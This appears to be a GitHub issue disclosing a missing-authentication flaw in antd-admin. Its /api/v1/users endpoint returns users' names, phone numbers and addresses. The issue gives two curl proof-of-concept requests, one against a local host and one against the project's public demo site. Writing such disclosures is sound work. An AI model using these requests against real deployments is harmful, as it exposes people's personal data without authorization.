Unauthorized access to some interfaces in the foreground leads to leakage of sensitive information
Install according to the official documents
2.1
Unauthorized access is found on some interfaces
For example:
/api/v1/users
the poc is :
curl -A 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36' http://192.168.0.125:7001/api/v1/users
2.2 At this time you can see some information back, such as the user ID, name, age, phone number, address and other sensitive information.
2.2 It can also be reproduced in the official sample site https://antd-admin.zuiidea.com/login?from=
the poc is :
curl -A 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36' https://antd-admin.zuiidea.com/api/v1/users
The text was updated successfully, but these errors were encountered:
The text was updated successfully, but these errors were encountered: